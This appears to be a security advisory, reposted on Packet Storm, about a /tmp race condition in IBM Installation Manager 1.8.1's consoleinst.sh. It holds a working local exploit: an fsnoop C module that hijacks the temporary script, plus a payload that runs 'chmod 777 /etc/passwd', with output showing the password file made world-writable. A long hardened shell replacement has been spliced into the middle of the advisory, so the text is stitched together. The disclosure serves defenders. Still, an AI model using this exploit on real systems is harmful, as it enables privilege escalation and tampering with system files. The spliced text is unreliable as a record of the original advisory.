IBM Installation Manager 1.8.1 Race Condition

2015-11-12T00:00:00
ID PACKETSTORM:134311
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2015-11-12T00:00:00

Description

Title: /tmp race condition in IBM Installation Manager V1.8.1 install script  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-10-29  
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev  
Vendor: IBM  
Vendor Notified: 0000-00-00  
Vendor Contact:  
Description: IBM Installation Manager is a command line utility to install  
various software packages developed by IBM.  
  
=====> IBM Installation Manager> Password required  
  
Credentials are required to connect to the IBM download site. Enter IBM ID  
and password.  
  
Select:  
P. Provide credentials and connect  
C. Cancel  
  
Select 'P' to enter credentials and connect, or 'C' to cancel.  
  
Forgot your IBM ID?  
https://www.ibm.com/account/profile?page=forgotuid  
Forgot your password?  
https://www.ibm.com/account/profile?page=forgot  
IBM ID help and FAQ  
https://www.ibm.com/account/profile/us/en?page=regfaqhelp  
-----> C  
Vulnerability:  
I noticed a /tmp race condition in IBM's Installation Manager software  
install script.  
The code in consoleinst.sh is:  
  
  
46 TEMP=/tmp  
47 tempScript=$TEMP/consoleinst-$$.sh  
48 scriptLoc=`dirname "$0"`  
49 slash=`expr "$scriptLoc" : "\(/\)"`  
50 if [ "X$slash" != "X/" ]; then  
51 scriptLoc=`pwd`/$scriptLoc  
52 fi  
53   
54 if [ "$0" != "$tempScript" ]; then  
55 cp "$0" "$tempScript"  
56 cd "$TEMP"  
57 origScriptLoc=$scriptLoc  
58 export origScriptLoc  
59 exec "$tempScript" $@  
60 # should not return from above exec  
61 exit 1  
62 fi  
  
  
If you guess the PID and create the file before the installer script does,  
you can inject code that is executed by the exec at line 59.  
  
This is a log of me controlling permissions of the file during installation  
of the product:  
  
[M] -rwxrwxrwx 1 larry larry 34 Thu Oct 29 21:46:10 2015  
/tmp/consoleinst-9999.sh  
[U] -rwxrwxrwx 1 larry larry 0 Thu Oct 29 21:46:34 2015  
/tmp/consoleinst-10382.sh  
[U] -rwxrwxrwx 1 larry larry 2225 Thu Oct 29 21:46:34 2015  
/tmp/consoleinst-10382.sh  
  
If I'm able to write to that file directly after it's modified (inotify() for  
the win), I could inject commands into that installation script.  
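A hardened replacement for the relaunch block quoted above, added here as an example and not IBM's code: the copy goes into a private mktemp -d directory instead of a predictable /tmp name, and the target is opened with noclobber so a pre-existing path fails the copy instead of being followed or overwritten. CONSOLEINST_PRIVATE_COPY is an assumed variable name used as the re-exec guard.

```shell
#!/bin/sh
# Hardened replacement for the relaunch block of consoleinst.sh (lines 46-62
# above). Added example, not IBM's code. The copy no longer lives at the
# predictable $TEMP/consoleinst-$$.sh; it goes into a fresh mktemp -d
# directory (random name, mode 0700), so another local user cannot
# pre-create, watch for, or rename the file that is later exec'd.

# copy_noclobber SRC DEST: write SRC to DEST only if DEST does not exist.
# set -C (noclobber) makes '>' open the target with O_EXCL, so a
# pre-planted file or symlink at DEST fails the copy instead of being
# followed or overwritten.
copy_noclobber() {
    ( set -C; cat "$1" > "$2" ) 2>/dev/null
}

# make_private_copy SRC: print the path of a private, executable copy of
# SRC, or fail (and clean up) without printing anything.
make_private_copy() {
    src=$1
    dir=$(mktemp -d "${TMPDIR:-/tmp}/consoleinst.XXXXXX") || return 1
    dest=$dir/consoleinst.sh
    if ! copy_noclobber "$src" "$dest" || ! chmod 0700 "$dest"; then
        rm -rf "$dir"
        return 1
    fi
    printf '%s\n' "$dest"
}

# relaunch_privately SCRIPT ARGS...: the replacement for the original
# cp + cd + exec sequence. CONSOLEINST_PRIVATE_COPY (an assumed name)
# replaces the "$0" != "$tempScript" test as the re-exec guard.
relaunch_privately() {
    script=$1; shift
    [ -n "${CONSOLEINST_PRIVATE_COPY-}" ] && return 0   # already the copy
    copy=$(make_private_copy "$script") || {
        echo "consoleinst: cannot create private copy of $script" >&2
        exit 1
    }
    origScriptLoc=$(cd "$(dirname "$script")" && pwd) || exit 1
    export origScriptLoc
    CONSOLEINST_PRIVATE_COPY=1; export CONSOLEINST_PRIVATE_COPY
    cd "$(dirname "$copy")" || exit 1
    exec "$copy" "$@"
}
```

The original script's self-test against `$tempScript` no longer works once the name is random, which is why the exported guard variable is needed to stop the copy from relaunching itself.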
CVEID:  
OSVDB:  
Exploit Code:  
/*  
fsnoop v3.3 module for exploitation of:  
http://www.vapidlabs.com/advisory.php?v=156  
special thanks to v14dz for getting this working, and Mudge @dotmudge for  
pointing me  
at his /tmp race condition tool l0pht-watch.  
  
@v14dz  
http://vladz.devzero.fr/  
  
$ make ibm-console.so  
  
/tmp/x is :  
  
#!/bin/sh  
chmod 777 /etc/passwd  
  
$ ./fsnoop -p ibm-consoleinst.so  
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **  
[+] ./ibm-consoleinst.so: payload=[0xb77775fb]  
file=[/tmp/consoleinst-HEREPID.sh]  
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"  
[+] ./ibm-consoleinst.so: Exploitation done.  
[+] ./ibm-consoleinst.so: Unloading module.  
  
ls -l /etc/passwd  
-rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd  
  
*/  
  
  
  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
  
char title[] = "** IBM Console Install Exploit **";  
  
/* filters */  
char proc_name[] = "/bin/sh ./consoleinst.sh";  
char file[] = "/tmp/consoleinst-HEREPID.sh";  
  
/* Evil routines */  
void payload() {   
int fd;  
/*from v14dz: I use a fifo here, to unlock the paymod execution right after  
the cp command*/  
mkfifo(file, 0666);  
fd = open(file, O_RDONLY);  
rename(file, "/tmp/a");  
rename("/tmp/x", file);  
}  
Screen Shots:  
Advisory: http://www.vapidlabs.com/advisory.php?v=156  